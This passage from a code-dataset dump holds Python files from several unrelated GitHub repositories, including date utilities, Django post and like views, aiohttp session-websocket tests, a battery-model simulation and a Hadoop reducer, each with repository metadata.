the_date = format_the_date(the_date)\n monday = the_date + timedelta(days=-the_date.weekday())\n next_monday = monday + timedelta(days=7)\n return monday, next_monday\n\n\ndef get_monday_and_sunday(the_date=None):\n the_date = format_the_date(the_date)\n monday = the_date + timedelta(days=-the_date.weekday())\n sunday = monday + timedelta(days=6)\n return monday, sunday\n\n\ndef get_this_and_next_month_first_day(the_date=None):\n the_date = format_the_date(the_date)\n month_first_day = date(the_date.year, the_date.month, 1)\n next_month_first_day = month_first_day + relativedelta(months=1)\n return month_first_day, next_month_first_day\n\n\ndef get_last_and_this_month_first_day(the_date=None):\n the_date = format_the_date(the_date)\n this_month_first_day = date(the_date.year, the_date.month, 1)\n last_month_first_day = 
this_month_first_day + relativedelta(months=-1)\n return last_month_first_day, this_month_first_day\n\n\ndef get_month_first_day_from_now(the_date=None, month_delta=0):\n the_date = format_the_date(the_date)\n month_first_day = date(the_date.year, the_date.month, 1)\n return month_first_day + relativedelta(months=month_delta)\n\n\ndef get_current_year_last_month():\n this_day = date.today()\n last_month_this_day = this_day + relativedelta(months=-1)\n return last_month_this_day.strftime('%Y-%m')\n\n\ndef get_current_month(the_date=None):\n the_date = format_the_date(the_date)\n return the_date.strftime('%Y-%m')\n\n\ndef weeks_between(d1, d2):\n if isinstance(d1, string_types):\n d = d1.split('-')\n d1 = datetime(int(d[0]), int(d[1]), int(d[2]))\n if isinstance(d2, string_types):\n d = d2.split('-')\n d2 = datetime(int(d[0]), int(d[1]), int(d[2]))\n return abs(d2.isocalendar()[1] - d1.isocalendar()[1])\n\n\ndef get_week_of_month(d=None):\n if d is None:\n d = datetime.now()\n week_of_year_end = d.strftime(\"%W\")\n week_of_year_begin = datetime(d.year, d.month, 1).strftime(\"%W\")\n return int(week_of_year_end) - int(week_of_year_begin) + 1\n\n\ndef get_pre_month(d=None):\n import calendar\n if d is None:\n d = datetime.now()\n if isinstance(d, string_types):\n d = datetime(int(d.split('-')[0]), int(d.split('-')[1]), 1)\n this_month_days = calendar.monthrange(d.year, d.month)[1]\n the_day_of_pre_month = d - timedelta(days=this_month_days)\n return datetime.strftime(the_day_of_pre_month, '%Y-%m')\n\n\ndef first_date_of_month(month=None):\n if month:\n return datetime.strptime(\"%s-01\" % month, \"%Y-%m-%d\")\n d = datetime.now()\n return date(d.year, d.month, 1)\n\n\ndef get_age(born):\n today = date.today()\n try:\n birthday = born.replace(year=today.year)\n except ValueError:\n # raised when birth date is February 29\n # and the current year is not a leap year\n birthday = born.replace(year=today.year, day=born.day - 1)\n if birthday > today:\n return today.year - born.year - 1\n else:\n return today.year - born.year\n\n\ndef is_valid_date(strdate):\n \"\"\"Check whether the string is a valid date string\"\"\"\n try:\n if \":\" in strdate:\n datetime.strptime(strdate, \"%Y-%m-%d %H:%M:%S\")\n else:\n datetime.strptime(strdate, \"%Y-%m-%d\")\n return True\n except:\n return False\n\ndef get_period_by_name(name):\n from .dateutils import get_next_date, format_the_date\n from datetime import datetime, timedelta\n if name == \"今天\":\n begin_time = format_the_date()\n end_time = get_next_date(begin_time)\n elif name == \"昨天\":\n end_time = format_the_date()\n begin_time = get_next_date(end_time, -1)\n elif name.startswith(\"近\") and name.endswith(\"分钟\"):\n end_time = datetime.now()\n begin_time = end_time + timedelta(minutes=-int(name[1:-2]))\n elif name.startswith(\"近\") and name.endswith(\"小时\"):\n end_time = datetime.now()\n begin_time = end_time + timedelta(hours=-int(name[1:-2]))\n elif name.startswith(\"近\") and name.endswith(\"天\"):\n end_time = get_next_date()\n begin_time = get_next_date(end_time, -int(name[1:-1]))\n elif \"至\" in name:\n drs = name.split(\"至\")\n begin_time = format_the_date(drs[0])\n end_time = get_next_date(drs[1])\n else:\n raise ValueError(\"Invalid date range format: %s\" % name)\n return (begin_time, end_time)\n\nCOMMON_DATES = {\n 'today': lambda d=None: format_the_date(the_date=d).isoformat(),\n 'this_month': lambda d=None: get_current_month(the_date=d),\n 'this_year': lambda d=None: format_the_date(the_date=d).year,\n 'yesterday': lambda d=None: get_next_date(the_date=d,days=-1).isoformat(),\n 'tomorrow': 
lambda d=None: get_next_date(the_date=d,days=1).isoformat(),\n 'week_begin': lambda d=None: get_monday_and_sunday(the_date=d)[0].isoformat(),\n 'week_end': lambda d=None: get_monday_and_sunday(the_date=d)[1].isoformat(),\n 'month_begin': lambda d=None: get_month_first_day_from_now(the_date=d).isoformat(),\n 'month_end': lambda d=None: get_next_date(get_this_and_next_month_first_day(the_date=d)[1], -1).isoformat(),\n 'next_month_begin': lambda d=None: get_this_and_next_month_first_day(the_date=d)[1].isoformat()\n}\n","repo_name":"szuprefix/py-xyz-util","sub_path":"xyz_util/dateutils.py","file_name":"dateutils.py","file_ext":"py","file_size_in_byte":6400,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22732392392","text":"from wagtail.core import blocks\nfrom wagtail.images.blocks import ImageChooserBlock\n\n\nclass AnnouncementBlock(blocks.StructBlock):\n class Meta:\n verbose_name = 'Bloc Annonce'\n template = \"home/blocks/announce.html\"\n\n title = blocks.CharBlock(verbose_name='titre')\n image = ImageChooserBlock(required=False)\n content = blocks.RichTextBlock(verbose_name='contenu')\n","repo_name":"codeanonorg/tutoweb","sub_path":"home/blocks.py","file_name":"blocks.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"9066554816","text":"#\n# /r/dailyprogrammer Challenge #262 [Easy] \n# MaybeNumeric \n# \t\t\t\t\t\t\t\t\t\t \n# Short Summary: The scope of this problem is kind of specific, so please see\n# the provided link for an accurare description of this problem\n# \t\t\t\t\t\t\t\t\t\t \n# Full Problem: https://www.reddit.com/r/dailyprogrammer/comments/3xdmtw/20151218_challenge_245_hard_guess_whois/\n# \n\ndef flatten(i):\n return sum(i, [])\n\ndef MaybeNumeric(input, delim = '`'):\n for word in flatten([x.split(delim) for x in input]):\n try:\n if( all(float(w) for w in word.split()) and delim == '`' ):\n yield list(MaybeNumeric([word], ' '))\n continue\n else:\n raise ArgumentError('Delimiter was not backtick')\n except Exception as e:\n try:\n float(word)\n yield '{} ({})'.format(word, 'number')\n except ValueError as e:\n yield '{} ({})'.format(word, 'string')\n except OverflowError as e:\n yield '{} ({})'.format(word, 'number')\n\n# Example usage (looks funky, I know)\n# print(list(\n# MaybeNumeric(['123','44.234','0x123N'])\n# ))\n","repo_name":"ennukee/djb_script_challenges","sub_path":"coding_challenges/dailyprogrammer/Python/Easy/262_easy/262_easy.py","file_name":"262_easy.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24686766227","text":"import os\nimport json\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom DESC_1RC import DESC_1RC\nfrom datetime import datetime\n\nnow = datetime.now()\nstart = now.strftime(\"%d/%m/%Y %H:%M:%S\")\n\n\ntemps=[-5, 5, 15, 25, 35, 45]\nmags= [20, 20, 40, 50, 50, 50]\n\n\n# Read modelocv.json file that contains parameters just for OCV data\n# Such OCV0, OCVrel OCVeta Q etc.\nwith open('model_files/DESC1Model_SLSQP.json') as json_file:\n model = json.load(json_file)\n\n# Define variable for rmse value\nrmse = np.zeros(len(temps))\n\n# Define font size for labels and colors\nxfontsize = 12\nyfontsize = 12\ncolors=['b', # blue\n 'g', #green\n 'r', #red\n 'c', #cyan\n 'm', #magenta\n 'y',# yellow\n 'orange', #orange\n 'purple', #purple\n 
]\n\nfor erhan in range(len(temps)):\n\n # Read UDDS dynamic data for specified temperature value\n if(temps[erhan]>0):\n script1 = \"dyn_data/THUN100_DYN_%02d_P%02d_S1.csv\" %(mags[erhan], temps[erhan]) \n data = pd.read_csv(script1)\n else:\n script1 = \"dyn_data/THUN100_DYN_%02d_N%02d_S1.csv\" %(mags[erhan], np.abs(temps[erhan])) \n data= pd.read_csv(script1)\n \n # Get voltage and current values.\n current = np.asarray(data['current'])\n voltage = np.asarray(data['voltage'])\n time = np.asarray(data['time'])/3600\n # Create model instance and initiliaze for the specified temperature.\n cell = DESC_1RC(model=model , temp=temps[erhan], dt=1.0,use_OCVS=True)\n\n # Plot simulated output and cell data output\n plt.figure()\n est_voltage = cell.fun([1.0,0.0,0.0],current)\n rmse[erhan]=np.sqrt(((voltage - est_voltage) ** 2).mean())\n plt.plot(time, est_voltage, color=colors[erhan], label='Simulation')\n plt.plot(time, voltage, label='True')\n plt.legend()\n plt.xlabel('Time(h)', fontsize = xfontsize, fontweight = 'bold')\n plt.ylabel('Voltage', fontsize = xfontsize, fontweight = 'bold')\n plt.title('Estimated Output Voltage for T=%02d, RMSE = %2.2fmV' % (temps[erhan],rmse[erhan]*1000))\n plt.show()\n plt.savefig('figures/simulations/Simulation_T_%02d.png' % temps[erhan], dpi=600, bbox_inches='tight')\n # Print rms error.\n print('RMS=%fmV'%(rmse[erhan]*1000))\n print('------------------------------------------------------------')\n\n# Get stop time\nnow = datetime.now()\nstop = now.strftime(\"%d/%m/%Y %H:%M:%S\")\n\n# Delete report file if exist\nif os.path.exists(\"reports/simulations/simulation_report.txt\"):\n os.remove(\"reports/simulations/simulation_report.txt\")\n\n# Create a report file and write results.\nf = open(\"reports/simulations/simulation_report.txt\", \"a\")\nf.write('\\r\\n')\nf.write('Simulation Results for DESC Model with 1-RC\\n')\nf.write('\\r\\n')\nfor erhan in range(len(temps)):\n f.write('Simulated Output Voltage RMSE=%2.2fmV at %02d°C Temp\\n' % (rmse[erhan]*1000, temps[erhan])) \nf.write('\\r\\n')\nf.write(\"Start Time =\" + start)\nf.write(\"\\nStop Time =\" + stop)\nf.write('\\n')\nf.close() # Close the file.\n\n","repo_name":"ErhanYILMAZ/DESC_Model","sub_path":"DESC_Simulation.py","file_name":"DESC_Simulation.py","file_ext":"py","file_size_in_byte":2997,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"37399439812","text":"#!/usr/bin/env python3\n\nimport sys\nimport math\n\nf = open(\"train_dict\", 'r')\ncount_dict={}\nlines = f.readlines();\nfor line in lines:\n line=line.strip()\n word,label,count = line.split('\\t')\n if(word==\"ANY\"):\n count_dict[label]=int(count)\n \n else:\n break;\n\n\n\nsf=0.1\nvsize=483243\nprevword=None\nword_class_dict={}\nindex_label_dict={}\nword_prob={}\n# input comes from STDIN (standard input)\nfor line in sys.stdin:\n line=line.strip()\n word,label,count = line.split('\\t')\n word=word.strip();\n if(label in count_dict.keys()):\n if(word!=prevword):\n word_class_dict={}\n word_prob={}\n prevword=word\n word_class_dict[label]=int(count);\n else:\n if(bool(word_class_dict)):\n for l in count_dict.keys():\n if(word_class_dict.get(l)==None):\n if(word_prob.get(word+'^'+l)==None):\n word_prob[word+'^'+l]=math.log(sf/(count_dict.get(l)+sf*vsize))\n if(index_label_dict.get(label+'^'+l)==None):\n index_label_dict[label+'^'+l]=int(count)*word_prob[word+'^'+l]\n else:\n index_label_dict[label+'^'+l]=index_label_dict[label+'^'+l]+int(count)*word_prob[word+'^'+l]\n else:\n 
if(word_prob.get(word+'^'+l)==None):\n word_prob[word+'^'+l]=math.log((word_class_dict.get(l)+sf)/(count_dict.get(l)+sf*vsize))\n if(index_label_dict.get(label+'^'+l)==None):\n index_label_dict[label+'^'+l]= int(count)*word_prob[word+'^'+l]\n else:\n index_label_dict[label+'^'+l]=index_label_dict[label+'^'+l]+int(count)*word_prob[word+'^'+l]\n \nfor key,value in index_label_dict.items():\n index,label=key.split('^')\n score=value\n \n print('%s\\t%s\\t%s' % (index,label,score))\n \n\n","repo_name":"chaikesh/DS-222_Assignment-01","sub_path":"Hadoop_map-reduce/Codes/reducer2.py","file_name":"reducer2.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"15755438878","text":"from django.shortcuts import render, redirect, get_object_or_404, HttpResponseRedirect\nfrom django.views.decorators.http import require_GET, require_POST, require_http_methods\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom django.http import JsonResponse, HttpResponseBadRequest\nfrom .models import Post, Image, HashTag\nfrom .forms import PostModelForm, ImageModelForm, CommentModelForm\n\n\n@login_required\n@require_http_methods(['GET', 'POST'])\ndef create_post(request):\n # Put the data that came in via POST into the ModelForm.\n if request.method == 'POST':\n # Put the data that came in via POST into the ModelForm.\n # ModelForm(data, files) - default\n post_form = PostModelForm(request.POST)\n # Validate the data.\n if post_form.is_valid():\n post = post_form.save(commit=False)\n post.user = request.user\n post.save()\n # Create HashTag => \n content = post_form.cleaned_data.get('content')\n words = content.split(' ') # split on spaces\n for word in words:\n if word[0] == '#':\n word = word[1:]\n tag = HashTag.objects.get_or_create(content=word) # (HashTagobj, True or False)\n post.tags.add(tag[0])\n if tag[1]:\n messages.add_message(request, messages.SUCCESS, f'You added the #{tag[0].content} tag for the first time! 
:)')\n for image in request.FILES.getlist('file'): # multiple photos come in stored as a list\n request.FILES['file'] = image\n image_form = ImageModelForm(files=request.FILES)\n if image_form.is_valid():\n image = image_form.save(commit=False) # no ForeignKey set yet\n image.post = post\n image.save()\n return redirect('posts:post_list')\n\n # If the request comes in via GET,\n else:\n # create a form for a new Post.\n post_form = PostModelForm()\n image_form = ImageModelForm()\n\n # Render the html and form for the user.\n return render(request, 'posts/form.html', {\n 'post_form': post_form,\n 'image_form': image_form,\n })\n\n\n@login_required\n@require_http_methods(['GET', 'POST'])\ndef update_post(request, post_id):\n post = get_object_or_404(Post, id=post_id)\n if post.user == request.user: # Is the author of the post being edited the user who sent the request?\n if request.method == 'POST':\n post_form = PostModelForm(request.POST, instance=post)\n if post_form.is_valid():\n post_form.save()\n # update HashTag\n post.tags.clear() # clear all existing tags\n content = post_form.cleaned_data.get('content')\n words = content.split(' ') # split on spaces\n for word in words:\n if word[0] == '#':\n word = word[1:]\n tag = HashTag.objects.get_or_create(content=word) # (HashTagobj, True or False)\n post.tags.add(tag[0])\n return redirect('posts:post_list')\n else:\n post_form = PostModelForm(instance=post)\n else: # if the author and the requesting user differ\n # 403 : Forbidden!\n return redirect('posts:post_list')\n\n return render(request, 'posts/form.html', {\n 'post_form': post_form\n })\n\n\n@require_GET\ndef post_list(request):\n if request.GET.get('next'):\n return redirect(request.GET.get('next'))\n posts = Post.objects.all()\n comment_form = CommentModelForm()\n\n return render(request, 'posts/list.html', {\n 'posts': posts,\n 'comment_form': comment_form,\n })\n\n\n@login_required\n@require_POST\ndef create_comment(request, post_id):\n post = get_object_or_404(Post, id=post_id)\n comment_form = CommentModelForm(request.POST)\n if comment_form.is_valid():\n comment = comment_form.save(commit=False)\n comment.user = request.user\n comment.post = post\n comment.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER', '/insta/'))\n # TODO else: => What if comment is not valid?\n\n\n@login_required\n@require_POST\ndef toggle_like(request, post_id):\n if request.is_ajax():\n user = request.user\n post = get_object_or_404(Post, id=post_id)\n is_active = True\n # if post.like_users.filter(id=user.id): # if found, [value] / otherwise []\n if user in post.like_users.all():\n post.like_users.remove(user)\n is_active = False\n else:\n post.like_users.add(user)\n\n return JsonResponse({\n 'likeCount': post.like_users.count(),\n 'is_active': is_active,\n })\n else:\n return HttpResponseBadRequest()\n\n@require_GET\ndef tag_posts_list(request, tag_name):\n tag = get_object_or_404(HashTag, content=tag_name)\n posts = tag.posts.all()\n comment_form = CommentModelForm()\n return render(request, 'posts/list.html', {'posts': posts, 'comment_form': comment_form, 'h1': f'Posts containing #{tag}.'})\n","repo_name":"Nenemttin/TIL","sub_path":"07_django/INSTA/posts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"9162808444","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('entrances', '0009_auto_20141110_1309'),\n ]\n\n operations = [\n 
migrations.AlterModelOptions(\n name='apartment',\n options={'ordering': ('floor', 'apartment_integer'), 'verbose_name': 'Apartment', 'verbose_name_plural': 'Apartments'},\n ),\n ]\n","repo_name":"Happyandhappy/django_email","sub_path":"entrances/migrations/0010_auto_20141112_0949.py","file_name":"0010_auto_20141112_0949.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2361264495","text":"import asyncio\nimport json\nimport time\nfrom unittest.mock import Mock\nimport uuid\n\nfrom aiohttp import CookieJar, WSMessage, WSMsgType, web\nfrom aiohttp.test_utils import make_mocked_request\nimport aiohttp_session\nimport pytest\n\nfrom aiohttp_session_ws import (\n DEFAULT_SESSION_KEY,\n REGISTRY_KEY,\n SessionWSRegistry,\n __version__,\n delete_session_ws_id,\n ensure_session_ws_id,\n get_session_ws_id,\n new_session_ws_id,\n schedule_close_all_session_ws,\n session_ws,\n session_ws_middleware,\n setup as setup_session_ws,\n)\n\n# pylint: disable=C0103, invalid-name\n# pylint: disable=R0201, no-self-use\n# pylint: disable=W0621, redefined-outer-name\n\n\ndef make_mock_wsr():\n return Mock(spec=web.WebSocketResponse)\n\n\n@pytest.fixture\ndef async_mock_call():\n async def async_mock_call_(*args, **kwargs):\n return (args, kwargs)\n\n return async_mock_call_\n\n\n@pytest.fixture\ndef registry():\n return SessionWSRegistry()\n\n\n@pytest.fixture\ndef req(registry):\n return make_mocked_request(\"GET\", \"/\", app={REGISTRY_KEY: registry})\n\n\n@pytest.fixture\ndef wsr():\n return make_mock_wsr()\n\n\n@pytest.fixture\ndef cookie_jar(event_loop):\n return CookieJar(unsafe=True, loop=event_loop)\n\n\n@pytest.fixture\ndef client(event_loop, app, cookie_jar):\n from aiohttp.test_utils import TestServer, TestClient\n\n _server = TestServer(app, loop=event_loop)\n _client = TestClient(_server, loop=event_loop, cookie_jar=cookie_jar)\n event_loop.run_until_complete(_client.start_server())\n yield _client\n event_loop.run_until_complete(_client.close())\n\n\ndef test_version():\n assert __version__ == \"1.1.1\"\n\n\n@pytest.mark.asyncio\nasync def test_get_session_ws_id(registry, req, async_mock_call):\n registry.get_id = async_mock_call\n assert await get_session_ws_id(req) == ((req,), {})\n\n\n@pytest.mark.asyncio\nasync def test_new_session_ws_id(registry, req, async_mock_call):\n registry.new_id = async_mock_call\n assert await new_session_ws_id(req) == ((req,), {})\n\n\n@pytest.mark.asyncio\nasync def test_delete_session_ws_id(registry, req, async_mock_call):\n registry.delete_id = async_mock_call\n assert await delete_session_ws_id(req) == ((req,), {})\n\n\n@pytest.mark.asyncio\nasync def test_ensure_session_ws_id(registry, req, async_mock_call):\n registry.ensure_id = async_mock_call\n assert await ensure_session_ws_id(req) == ((req,), {})\n\n\n@pytest.mark.asyncio\nasync def test_schedule_close_all_session_ws(registry, req, async_mock_call):\n resp = Mock()\n registry.schedule_close_all_session = async_mock_call\n assert await schedule_close_all_session_ws(req, resp) == ((req, resp), {})\n\n\n@pytest.mark.asyncio\nasync def test_session_ws_middleware(req, registry, async_mock_call):\n response = web.Response()\n registry.ensure_id = Mock(side_effect=async_mock_call)\n\n async def handler(request): # pylint: disable=W0613, unused-argument\n return response\n\n returned_response = await session_ws_middleware(req, handler)\n assert response is returned_response\n 
registry.ensure_id.assert_called_once_with(req)\n\n\n@pytest.mark.asyncio\nasync def test_setup(registry, async_mock_call):\n event = asyncio.Event()\n response = Mock(spec=web.WebSocketResponse)\n response.close = event.wait\n registry.close_all = Mock(side_effect=async_mock_call)\n\n registry._registry[0] = set([response])\n app = web.Application()\n setup_session_ws(app, registry)\n app.freeze()\n\n assert app[REGISTRY_KEY] == registry\n\n fut = asyncio.ensure_future(app.shutdown())\n event.set()\n await asyncio.sleep(.01)\n assert fut.done()\n assert not fut.exception()\n registry.close_all.assert_called_once_with()\n\n\nCOOKIE_NAME = \"AIOHTTP_SESSION_WEBSOCKET\"\n\n\ndef get_session_data(resp):\n return json.loads(resp.cookies[COOKIE_NAME].value).get(\"session\", {})\n\n\ndef make_cookie(data):\n return json.dumps({\"session\": data, \"created\": int(time.time())})\n\n\nclass TestSessionWS:\n @pytest.fixture\n def app(self):\n async def handle_websocket(request):\n async with session_ws(request) as wsr:\n session_ws_id = await get_session_ws_id(request)\n async for msg in wsr: # pylint: disable=W0612, unused-variable\n await wsr.send_str(str(session_ws_id))\n return wsr\n\n app = web.Application(\n middlewares=[\n aiohttp_session.session_middleware(\n aiohttp_session.SimpleCookieStorage(cookie_name=COOKIE_NAME)\n )\n ]\n )\n app.router.add_get(\"/ws\", handle_websocket)\n\n setup_session_ws(app, SessionWSRegistry())\n return app\n\n @pytest.mark.asyncio\n async def test_without_session(self, app, client):\n wsr = await client.ws_connect(\"/ws\")\n wsr_resp = wsr._response\n wsr_session_data = get_session_data(wsr_resp)\n session_ws_id = wsr_session_data[DEFAULT_SESSION_KEY]\n assert len(app[REGISTRY_KEY][session_ws_id]) == 1\n\n await wsr.close()\n assert session_ws_id not in app[REGISTRY_KEY]\n\n @pytest.mark.asyncio\n async def test_with_session(self, app, client, cookie_jar):\n data = {DEFAULT_SESSION_KEY: 0}\n cookie_jar.update_cookies({COOKIE_NAME: make_cookie(data)})\n wsr = await client.ws_connect(\"/ws\")\n assert COOKIE_NAME not in wsr._response.cookies\n assert data[DEFAULT_SESSION_KEY] in app[REGISTRY_KEY]\n\n await wsr.close()\n assert data[DEFAULT_SESSION_KEY] not in app[REGISTRY_KEY]\n\n @pytest.mark.asyncio\n async def test_inner(self, app, client, cookie_jar):\n data = {DEFAULT_SESSION_KEY: 0}\n cookie_jar.update_cookies({COOKIE_NAME: make_cookie(data)})\n wsr = await client.ws_connect(\"/ws\")\n await wsr.send_str(\"...\")\n\n resp = await wsr.receive()\n assert isinstance(resp, WSMessage)\n assert resp.data == \"0\"\n await wsr.close()\n assert data[DEFAULT_SESSION_KEY] not in app[REGISTRY_KEY]\n\n\nclass TestSessionWSRegistry:\n @staticmethod\n def make_request_session_tuple(session_ws_id=None):\n request = make_mocked_request(\"GET\", \"/\")\n session = aiohttp_session.Session(\n \"identity\",\n data={\n \"created\": int(time.time()),\n \"session\": {DEFAULT_SESSION_KEY: session_ws_id},\n }\n if session_ws_id\n else {\"created\": int(time.time())},\n new=True,\n )\n request[aiohttp_session.SESSION_KEY] = session\n return request, session\n\n def test__getitem__(self, registry, wsr):\n registry._registry[0] = set([wsr])\n assert registry[0] == set([wsr])\n\n def test__iter__(self, registry, wsr):\n registry._registry[0] = set([wsr])\n assert list(registry) == [0]\n\n def test__len__(self, registry, wsr):\n registry._registry[0] = set([wsr])\n assert len(registry) == 1\n\n @pytest.mark.asyncio\n @pytest.mark.parametrize(\n (\"session_ws_id\"),\n [pytest.param(None, 
id=\"missing\"), pytest.param(\"dummy\", id=\"exists\")],\n )\n async def test_get_id(self, registry, session_ws_id):\n # pylint: disable=W0612, unused-variable\n request, session = self.make_request_session_tuple(session_ws_id)\n assert await registry.get_id(request) == session_ws_id\n\n @pytest.mark.asyncio\n async def test_new_id_with_default_id_factory(self, registry):\n request, session = self.make_request_session_tuple()\n await registry.new_id(request)\n\n session_id = session[DEFAULT_SESSION_KEY]\n assert uuid.UUID(session_id)\n\n @pytest.mark.asyncio\n async def test_async_id_factory(self):\n called_with = None\n\n async def dummy_id_factory(request):\n nonlocal called_with\n called_with = request\n return id(request)\n\n registry = SessionWSRegistry(id_factory=dummy_id_factory)\n request, session = self.make_request_session_tuple()\n await registry.new_id(request)\n\n assert called_with == request\n assert session[DEFAULT_SESSION_KEY] == id(request)\n\n @pytest.mark.asyncio\n @pytest.mark.parametrize(\n (\"session_ws_id\"),\n [pytest.param(None, id=\"missing\"), pytest.param(\"dummy\", id=\"exists\")],\n )\n async def test_delete_id(self, session_ws_id, registry):\n request, session = self.make_request_session_tuple(session_ws_id)\n await registry.delete_id(request)\n assert DEFAULT_SESSION_KEY not in session\n\n @pytest.mark.asyncio\n @pytest.mark.parametrize(\n (\"initial\", \"factory\", \"expected\"),\n [\n pytest.param(None, lambda req: \"found\", \"found\", id=\"missing\"),\n pytest.param(\"dummy\", lambda req: ..., \"dummy\", id=\"exists\"),\n ],\n )\n async def test_ensure_id(self, initial, factory, expected):\n registry = SessionWSRegistry(id_factory=factory)\n request, session = self.make_request_session_tuple(initial)\n await registry.ensure_id(request)\n assert session[DEFAULT_SESSION_KEY] == expected\n\n @pytest.mark.asyncio\n async def test_schedule_close_all_session(self, registry):\n event = asyncio.Event()\n registry.close_all_session = Mock(\n side_effect=registry.close_all_session\n )\n response = Mock(spec=web.Response)\n\n # pylint: disable=W0612, unused-variable\n request, session = self.make_request_session_tuple(\"dummy\")\n request._task = asyncio.ensure_future(event.wait())\n\n await registry.schedule_close_all_session(request, response)\n registry.close_all_session.assert_not_called()\n response.force_close.assert_called_once_with()\n\n event.set()\n await asyncio.sleep(.01)\n registry.close_all_session.assert_called_once_with(\"dummy\")\n\n @pytest.mark.asyncio\n async def test_close_all(self, registry, wsr):\n event = asyncio.Event()\n wsr.close = event.wait\n registry._registry[0] = set([wsr])\n\n fut = asyncio.ensure_future(registry.close_all())\n event.set()\n await asyncio.sleep(.01)\n assert fut.done()\n assert not fut.exception()\n\n @pytest.mark.asyncio\n async def test_close_all_session(self, registry, wsr):\n event = asyncio.Event()\n wsr.close = event.wait\n\n registry._registry[0] = set([wsr])\n\n fut = asyncio.ensure_future(registry.close_all_session(0))\n event.set()\n await asyncio.sleep(.01)\n assert fut.done()\n assert not fut.exception()\n\n def test_register(self, registry, wsr):\n registry.register(0, wsr)\n assert dict(registry) == {0: set([wsr])}\n\n def test_unregister_missing(self, registry, wsr):\n \"\"\"\n Doesn't raise.\n \"\"\"\n registry.unregister(0, wsr)\n\n def test_unregister_last(self, registry, wsr):\n \"\"\"\n Removes key-value pair from registry\n \"\"\"\n registry._registry[0] = set([wsr])\n registry.unregister(0, 
wsr)\n assert 0 not in registry\n\n def test_unregister_not_last(self, wsr):\n \"\"\"\n KVP remains\n \"\"\"\n registry = SessionWSRegistry()\n wsr2 = make_mock_wsr()\n registry._registry[0] = set([wsr, wsr2])\n registry.unregister(0, wsr)\n assert registry.get(0) == set([wsr2])\n\n\nclass TestIntegration:\n @pytest.fixture\n def app(self):\n async def handle_root(request):\n # pylint: disable=W0613, unused-argument\n return web.Response(text=\"root\")\n\n async def handle_clear(request):\n response = web.Response(text=\"clear\")\n await schedule_close_all_session_ws(request, response)\n return response\n\n async def handle_websocket(request):\n async with session_ws(request) as wsr:\n # pylint: disable=W0613, unused-argument\n async for msg in wsr:\n await wsr.send_str(msg.data)\n return wsr\n\n app = web.Application(\n middlewares=[\n aiohttp_session.session_middleware(\n aiohttp_session.SimpleCookieStorage(cookie_name=COOKIE_NAME)\n ),\n session_ws_middleware,\n ]\n )\n app.router.add_get(\"/\", handle_root)\n app.router.add_get(\"/clear\", handle_clear)\n app.router.add_get(\"/ws\", handle_websocket)\n\n setup_session_ws(app, SessionWSRegistry())\n return app\n\n @pytest.mark.asyncio\n @pytest.mark.parametrize(\n (\"initial\",),\n [pytest.param(0, id=\"exists\"), pytest.param(None, id=\"dne\")],\n )\n async def test_receive_session_ws(self, client, initial, cookie_jar):\n data = {DEFAULT_SESSION_KEY: initial} if initial else {}\n cookie_jar.update_cookies({COOKIE_NAME: make_cookie(data)})\n resp = await client.get(\"/\")\n\n session_data = get_session_data(resp)\n assert DEFAULT_SESSION_KEY in session_data\n\n @pytest.mark.asyncio\n async def test_close_session_ws(self, client):\n wsr = await client.ws_connect(\"/ws\")\n wsr_resp = wsr._response\n wsr_session_data = get_session_data(wsr_resp)\n assert wsr_session_data.get(DEFAULT_SESSION_KEY)\n\n clear_resp = await client.get(\"/clear\")\n assert clear_resp.status == 200\n\n wsr_msg = await wsr.receive()\n assert wsr_msg.type is WSMsgType.CLOSE\n assert wsr.closed\n","repo_name":"dfee/aiohttp_session_ws","sub_path":"tests/test_aiohttp_session_ws.py","file_name":"test_aiohttp_session_ws.py","file_ext":"py","file_size_in_byte":13496,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"14181805123","text":"import os\r\nimport glob\r\nimport random\r\nfrom PIL import Image\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom tfl_maneger.part1_api import find_tfl_lights\r\n\r\n\r\ndef find_a_not_tfl(gt_im):\r\n while True:\r\n not_tfl_y = random.randint(0, len(gt_im) - 5)\r\n not_tfl_x = random.randint(0, len(gt_im[0]) - 5)\r\n if gt_im[not_tfl_y, not_tfl_x] != 19:\r\n return (not_tfl_x, not_tfl_y)\r\n\r\n\r\ndef crop_image(image, x, y):\r\n left = max(x - 41, 0)\r\n right = min(x + 40, len(image[0]) - 1)\r\n top = max(y - 41, 0)\r\n bottom = min(y + 40, len(image) - 1)\r\n left_add = abs(min(x - 41, 0))\r\n right_add = max(x + 40 - (len(image[0]) - 1), 0)\r\n top_add = abs(min(y - 41, 0))\r\n bottom_add = max(y + 40 - (len(image) - 1), 0)\r\n image = image[top:bottom, left:right]\r\n result = np.hstack((np.hstack((np.zeros((len(image), left_add, 3)), image)), np.zeros((len(image), right_add, 3))))\r\n result = np.vstack(\r\n (np.vstack((np.zeros((top_add, len(result[0]), 3)), result)), np.zeros((bottom_add, len(result[0]), 3))))\r\n return result\r\n\r\n\r\ndef configure_image(image, path):\r\n print(\"========================\")\r\n gt_im = image.replace('leftImg8bit', 
